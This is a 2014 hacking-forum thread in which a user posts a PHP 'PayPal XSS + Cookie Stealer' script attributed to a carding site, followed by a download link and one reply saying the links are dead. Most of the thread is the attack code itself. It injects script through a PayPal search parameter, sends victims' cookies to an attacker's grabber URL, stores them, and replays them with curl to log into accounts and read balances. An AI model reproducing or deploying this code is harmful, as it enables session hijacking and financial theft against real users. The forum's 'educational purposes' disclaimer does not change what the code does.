Hello There, Guest! Login Register
Logo
Dismiss this notice
MaDLeeTs is not responsible for any attacks that are carried out on networks, websites or servers.
MaDLeeTs staff members cannot be held responsible.
All information on this forum is for educational purposes only.


PayPal XSS + Cookie Stealer Exploit

  • 0 Vote(s) - 0 Average


02-03-2014, 05:22 PM #1
AL1R3Z4 Offline Respected *****
Respected
Posts:51 Threads:14 Joined:Jan 2014 Reputation: 3
Mood: None
hi bro.s
http://1337day.com/exploit/description/20344

PHP Code:
<?php
/*
Website: You are not allowed to view links. Register or Login to view.
PayPal Cookie Stealer exploit XSS-Free (CarderX.com)
Coded by: mainl00p
Type: Private <No leech. **** you! **** m1nu3t and all his band _|_!>
(O)
<M
o <M PayPal Blow Up! Cross Site Scripting (The SWORD TEAM)
/| ...... /:M\------------------------------------------------,,,,,,
(O)[]XXXXXX[]I:K+}=====<{H}>================================------------>
\| ^^^^^^ \:W/------------------------------------------------''''''
o <W mainl00p
<W You are not allowed to view links. Register or Login to view.
(O)
*/

define("PPLOGIN_URL""https://www.paypal.com/en");
define("PPXSS_URL""https://www.paypal.com/it/cgi-bin/webscr?cmd=_shop-search-ext&search_cat_name=%22/%3E%27&q=%22&search_cat=&region=%22%3E%3Ciframe%20onload=alert(0)/%3E");
define("COOKIE_FILE""carderX.txt"); // A COOKIE FILE (WHERE TO STORE THE COOKIES)
define("EXPLOIT_URL""http://carderx.com/temp/exploit.php"); // HERE YOU NEED TO PUT YOUR GRABBER'S URL

// I put automatically those fields (_t must be there, it can have random value, I preferred NULL)
function doXSS($Vector) {
echo 
"<form id=\"sui_m\" name=\"sui_m\" method=\"post\" class=\"\" action=\"" PPXSS_URL "\">
<input type=\"hidden\" name=\"_t\" value=\"\"/>
<input type=\"hidden\" name=\"_fl\" value=\"1\" />
<input type=\"hidden\" name=\"atoi\" value=\"0\" />
<input type=\"hidden\" name=\"min\" value=\"0\" />
<input type=\"hidden\" name=\"max[0]\" value=\"\" />
<input type=\"hidden\" name=\"load\" value=\"
$Vector\" />
</form>
<script type=\"text/javascript\">document.getElementById(\"sui_m\").submit();</script>"
;
}

// Gets the cookie from GET parameter returned by XSS and stores it in file
function getCookie() {
if (isset(
$_GET["c"])) {
$f fopen(COOKIE_FILE"a");
$c base64_encode($_GET["c"]);
fwrite($f$c "\n");
fclose($f);
}
}

// Reads the cookie from file
function readCookies() {
$c file_get_contents(COOKIE_FILE);
return 
explode("\n"$c);
}

// Logs in and checks the ballance
function check($Cookie) {
$ch curl_init();
curl_setopt($chCURLOPT_URLPPLOGIN_URL);
curl_setopt($chCURLOPT_FOLLOWLOCATION1);
curl_setopt($chCURLOPT_SSL_VERIFYPEER1);
curl_setopt($chCURLOPT_RETURNTRANSFER1);
curl_setopt($chCURLOPT_COOKIE$Cookie);
$s curl_exec($ch);
if (
preg_match("/Ballance: (.*)\<\/b\>/i"$s$z))
return 
$z[1];
return 
NULL;
}


// MAIN
if (isset($_GET["admin"]) && $_GET["admin"] == "true") {
$ck readCookies();
echo 
"<table style=\"font-size: 12px;\">\n";
echo 
"<tr style=\"background-color: red; color: white;\"><td style=\"width: 50px;\"><b>Id</b></td><td style=\"width: 700px;\"><b>Cookie</b></td><td><b>Check</b></td></tr>\n";
$i 0;
foreach (
$ck as $c) {
echo 
"<tr style=\"background-color: grey;\"><td>" . ++$i "</td><td>$c</td><td><a href=\"?check=" base64_encode($c) . "\">Check</a></td></tr>\n";
}
die(
"");
}

if (isset(
$_GET["check"]) && $_GET["check"] != "") {
$cz check(check($_GET["check"]));
if (
$cz != NULL)
echo 
"Ballance: " $cz;
else
echo 
"Error logging in!";
die(
"");
}

$XSS "\"><script>window.location=" EXPLOIT_URL "?c=" "\" + document.cookie;</script>";
doXSS($XSS);
?>


Full script in txt file for dl:
php: http://www.speedyshare.com/zS4qF/download/paypalXSS.rar

05-14-2014, 07:32 PM #2
adlawa Offline Junior Member **
Registered
Posts:8 Threads:1 Joined:Dec 2013 Reputation: 0
Mood: Blah
Links dead !






Forum Jump:


Users browsing this thread:1 Guest(s)